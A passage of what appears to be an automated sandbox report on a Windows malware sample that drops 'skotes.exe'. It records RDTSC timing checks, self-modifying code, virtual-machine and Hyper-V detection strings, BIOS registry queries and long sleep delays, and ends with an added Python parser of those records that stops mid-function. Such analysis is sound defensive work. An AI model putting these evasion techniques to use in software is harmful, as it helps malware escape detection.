                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105B2 second address: 54105C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f mov bx, 5D10h 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105C6 second address: 54105CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54105CD second address: 5410622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007F6F31ADDF6Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F6F31ADDF70h 0x00000016 push FFFFFFFEh 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F6F31ADDF6Eh 0x0000001f sub esi, 7C5C0BB8h 0x00000025 jmp 00007F6F31ADDF6Bh 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d mov ecx, 2BC9BD85h 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410622 second address: 5410679 instructions: 0x00000000 rdtsc 0x00000002 mov cx, AD01h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 call 00007F6F31405BD9h 0x0000000e jmp 00007F6F31405BDCh 0x00000013 push eax 0x00000014 jmp 00007F6F31405BDBh 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007F6F31405BE9h 0x00000022 mov eax, dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6F31405BDCh 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410679 second address: 541068B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31ADDF6Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541068B second address: 54106C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F6F31405BE9h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6F31405BDDh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54106C9 second address: 541072A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F6F31ADDF69h 0x0000000e jmp 00007F6F31ADDF6Eh 0x00000013 push eax 0x00000014 pushad 0x00000015 pushad 0x00000016 mov si, 2599h 0x0000001a popad 0x0000001b mov ecx, 69458255h 0x00000020 popad 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 jmp 00007F6F31ADDF6Bh 0x0000002a mov eax, dword ptr [eax] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F6F31ADDF74h 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541072A second address: 5410758 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F31405BE1h 0x00000009 sbb ax, 1946h 0x0000000e jmp 00007F6F31405BE1h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410758 second address: 5410780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6F31ADDF79h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410780 second address: 5410786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410786 second address: 541078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541078B second address: 54107A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6F31405BE0h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54107A5 second address: 5410804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F6F31ADDF75h 0x00000018 and eax, 0FD90416h 0x0000001e jmp 00007F6F31ADDF71h 0x00000023 popfd 0x00000024 mov edi, eax 0x00000026 popad 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6F31ADDF79h 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410804 second address: 5410814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31405BDCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410814 second address: 5410853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F6F31ADDF6Ch 0x0000000f call 00007F6F31ADDF72h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 popad 0x00000018 nop 0x00000019 pushad 0x0000001a mov bl, 43h 0x0000001c mov eax, 2D0D11C5h 0x00000021 popad 0x00000022 sub esp, 1Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410853 second address: 5410870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410870 second address: 5410876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410876 second address: 54108B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a movzx ecx, di 0x0000000d mov cl, bl 0x0000000f popad 0x00000010 mov dword ptr [esp], ebx 0x00000013 jmp 00007F6F31405BE6h 0x00000018 xchg eax, esi 0x00000019 jmp 00007F6F31405BE0h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54108B7 second address: 54108BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54108BB second address: 54108C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54108C1 second address: 54108C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54108C7 second address: 54108CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54108CB second address: 541092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a jmp 00007F6F31ADDF73h 0x0000000f pushfd 0x00000010 jmp 00007F6F31ADDF78h 0x00000015 sub cx, C008h 0x0000001a jmp 00007F6F31ADDF6Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F6F31ADDF75h 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541092B second address: 5410931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410931 second address: 5410935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410935 second address: 5410973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6F31405BE6h 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 mov bh, al 0x00000012 push edi 0x00000013 mov eax, 7E92D055h 0x00000018 pop esi 0x00000019 popad 0x0000001a mov eax, dword ptr [76FBB370h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6F31405BDCh 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410973 second address: 5410A1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007F6F31ADDF76h 0x00000011 xor eax, ebp 0x00000013 jmp 00007F6F31ADDF71h 0x00000018 nop 0x00000019 pushad 0x0000001a call 00007F6F31ADDF6Ch 0x0000001f pushfd 0x00000020 jmp 00007F6F31ADDF72h 0x00000025 jmp 00007F6F31ADDF75h 0x0000002a popfd 0x0000002b pop eax 0x0000002c push ebx 0x0000002d mov bh, ch 0x0000002f pop edx 0x00000030 popad 0x00000031 push eax 0x00000032 jmp 00007F6F31ADDF6Fh 0x00000037 nop 0x00000038 jmp 00007F6F31ADDF76h 0x0000003d lea eax, dword ptr [ebp-10h] 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A1A second address: 5410A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A20 second address: 5410A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A25 second address: 5410A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 80ABh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr fs:[00000000h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edi, 60D7E94Ch 0x0000001a pushfd 0x0000001b jmp 00007F6F31405BE5h 0x00000020 sub ah, 00000026h 0x00000023 jmp 00007F6F31405BE1h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A6B second address: 5410A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A71 second address: 5410A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A75 second address: 5410A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A97 second address: 5410A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A9B second address: 5410AB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410AB6 second address: 5410ABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410ABC second address: 5410AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410AC0 second address: 5410B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b pushad 0x0000000c movsx edi, ax 0x0000000f mov dl, al 0x00000011 popad 0x00000012 test eax, eax 0x00000014 pushad 0x00000015 mov ch, dl 0x00000017 pushfd 0x00000018 jmp 00007F6F31405BE8h 0x0000001d adc ah, FFFFFFE8h 0x00000020 jmp 00007F6F31405BDBh 0x00000025 popfd 0x00000026 popad 0x00000027 jne 00007F6FA2EB4DFAh 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F6F31405BE4h 0x00000034 adc al, 00000048h 0x00000037 jmp 00007F6F31405BDBh 0x0000003c popfd 0x0000003d mov dx, ax 0x00000040 popad 0x00000041 sub eax, eax 0x00000043 jmp 00007F6F31405BDBh 0x00000048 mov dword ptr [ebp-20h], eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F6F31405BE5h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410B56 second address: 5410BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 jmp 00007F6F31ADDF73h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [esi] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6F31ADDF74h 0x00000016 sub si, 8868h 0x0000001b jmp 00007F6F31ADDF6Bh 0x00000020 popfd 0x00000021 mov ecx, 67EAAE5Fh 0x00000026 popad 0x00000027 mov dword ptr [ebp-24h], ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F6F31ADDF71h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410BB6 second address: 5410BD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410BD3 second address: 5410BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410BD7 second address: 5410BEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410BEA second address: 5410C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6FA358CFDCh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6F31ADDF6Ch 0x00000016 or si, 6AB8h 0x0000001b jmp 00007F6F31ADDF6Bh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F6F31ADDF78h 0x00000027 add ecx, 45E0A518h 0x0000002d jmp 00007F6F31ADDF6Bh 0x00000032 popfd 0x00000033 popad 0x00000034 cmp ebx, FFFFFFFFh 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F6F31ADDF70h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410C6F second address: 5410C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410C73 second address: 5410C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5410C79 second address: 54105A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 call 00007F6F31405BE8h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F6FA2EB4BB6h 0x00000014 jne 00007F6F31405BF9h 0x00000016 xor ecx, ecx 0x00000018 mov dword ptr [esi], ecx 0x0000001a mov dword ptr [esi+04h], ecx 0x0000001d mov dword ptr [esi+08h], ecx 0x00000020 mov dword ptr [esi+0Ch], ecx 0x00000023 mov dword ptr [esi+10h], ecx 0x00000026 mov dword ptr [esi+14h], ecx 0x00000029 mov ecx, dword ptr [ebp-10h] 0x0000002c mov dword ptr fs:[00000000h], ecx 0x00000033 pop ecx 0x00000034 pop edi 0x00000035 pop esi 0x00000036 pop ebx 0x00000037 mov esp, ebp 0x00000039 pop ebp 0x0000003a retn 0004h 0x0000003d nop 0x0000003e pop ebp 0x0000003f ret 0x00000040 add esi, 18h 0x00000043 pop ecx 0x00000044 cmp esi, 00F856A8h 0x0000004a jne 00007F6F31405BC0h 0x0000004c push esi 0x0000004d call 00007F6F31406443h 0x00000052 push ebp 0x00000053 mov ebp, esp 0x00000055 push dword ptr [ebp+08h] 0x00000058 call 00007F6F358D91A9h 0x0000005d mov edi, edi 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F6F31405BE1h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 541000A second address: 541000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 541000F second address: 5410015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: F8E8EB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11B4760 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: EFE8EB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: 1124760 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_05460D0E rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window / User API: threadDelayed 475
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window / User API: threadDelayed 1168
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window / User API: threadDelayed 1122
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5780 | Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4340 | Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4340 | Thread sleep time: -76038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5596 | Thread sleep count: 475 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5596 | Thread sleep time: -14250000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2676 | Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6044 | Thread sleep count: 1168 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6044 | Thread sleep time: -2337168s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3192 | Thread sleep count: 1122 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3192 | Thread sleep time: -2245122s >= -30000s
Source: C:\Users\user\Desktop\file.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 180000
Source: skotes.exe, 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957282024.0000000000658000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1758083562.000000000110E000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1786860547.000000000107E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1787078396.000000000107E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW#
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
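The interceptor lines above record what executed between two consecutive rdtsc reads. The Python below is an added example for this report, not Joe Sandbox code and not code from the sample: it parses eight of those lines (copied verbatim into SAMPLE), links them into the runs of consecutive reads, and classifies the instructions in each gap. Two readings are this example's own, not statements the report makes: instructions bracketed by pushad/popad are counted as discarded work because popad restores every register, and a read followed (after any jmp) by pop edx; pop eax is counted as a discarded timestamp because those pops overwrite the value rdtsc just produced.

```python
"""Parse Joe Sandbox "RDTSC instruction interceptor" lines and summarise what
the code between two consecutive rdtsc reads actually does.

Added example for this report, not Joe Sandbox code. Treating pushad/popad
brackets as discarded work and "rdtsc; pop edx; pop eax" as a discarded
timestamp is this example's own reading of the listings.
"""
import re

# Constructed input: eight of the interceptor lines printed above, verbatim.
SAMPLE = """
RDTSC instruction interceptor: First address: 5410BB6 second address: 5410BD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
RDTSC instruction interceptor: First address: 5410BD3 second address: 5410BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
RDTSC instruction interceptor: First address: 5410BD7 second address: 5410BEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
RDTSC instruction interceptor: First address: 5410BEA second address: 5410C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6FA358CFDCh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6F31ADDF6Ch 0x00000016 or si, 6AB8h 0x0000001b jmp 00007F6F31ADDF6Bh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F6F31ADDF78h 0x00000027 add ecx, 45E0A518h 0x0000002d jmp 00007F6F31ADDF6Bh 0x00000032 popfd 0x00000033 popad 0x00000034 cmp ebx, FFFFFFFFh 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F6F31ADDF70h 0x00000040 rdtsc
RDTSC instruction interceptor: First address: 5410C6F second address: 5410C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
RDTSC instruction interceptor: First address: 5410C73 second address: 5410C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
RDTSC instruction interceptor: First address: 541000A second address: 541000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
RDTSC instruction interceptor: First address: 541000F second address: 5410015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
"""

RECORD_RE = re.compile(
    r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+) instructions: (.+)$"
)
# Instructions that only shuffle state through the stack or control flow and
# carry no comparison a timing check could depend on.
NOISE = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "jmp", "nop", "rdtsc"}


def parse_records(text):
    """Return [(first_addr, second_addr, [(offset, insn), ...]), ...]."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.search(line)
        if not m:
            continue
        # "0x00000000 rdtsc 0x00000002 jmp ..." -> ['', '00000000', 'rdtsc', ...]
        parts = re.split(r"\s*0x([0-9a-f]{8})\s+", m.group(3))
        insns = list(zip((int(o, 16) for o in parts[1::2]), parts[2::2]))
        records.append((int(m.group(1), 16), int(m.group(2), 16), insns))
    return records


def analyze(record):
    """Classify the instructions between the two rdtsc reads of one record."""
    first, second, insns = record
    depth, shielded, effective = 0, 0, []
    for _, insn in insns:
        mnem = insn.split()[0]
        if mnem == "pushad":
            depth += 1
            continue
        if mnem == "popad":
            depth = max(depth - 1, 0)   # a popad may close a pushad before this record
            continue
        if depth:
            shielded += 1               # every register is restored by popad
        elif mnem not in NOISE:
            effective.append(insn)      # the only work that survives the gap
    # eax:edx reloaded from the stack right after the read => value discarded
    after = [i.split() for _, i in insns[1:] if not i.startswith("jmp")]
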